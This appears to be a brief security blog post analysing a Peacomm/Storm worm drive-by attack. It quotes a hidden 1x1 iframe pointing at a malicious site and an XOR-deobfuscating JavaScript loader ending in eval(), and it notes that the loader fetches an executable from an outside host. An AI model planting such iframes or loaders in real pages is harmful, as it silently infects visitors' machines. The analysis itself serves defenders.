Peacomm gets scrappy with Kaspersky

This was sent to us by a reader earlier this week:

<iframe src=\"http://kqfloat.com/ind.php\" alt=\"BYDLOSHKA\" height=\"1\" width=\"1\"></iframe>

I spent a few minutes looking at the code this evening...

Downloads xored javascript (like usual) ->

function xor_str(plain_str, xor_key){ var xored_str = \"\";
for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; } function kaspersky(suck,dick){}; function
kaspersky2(suck_dick,again){};var plain_str =
....
....
SNIP
....
....
var xored_str = xor_str(plain_str, 200); eval(xored_str);

which downloads -> 'http:// fncarp.com /sony.exe' using the useragent:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1921)

Sony.exe appears to be static, just like video.exe and setup.exe (c05893a656b54164fb486028309bd89e)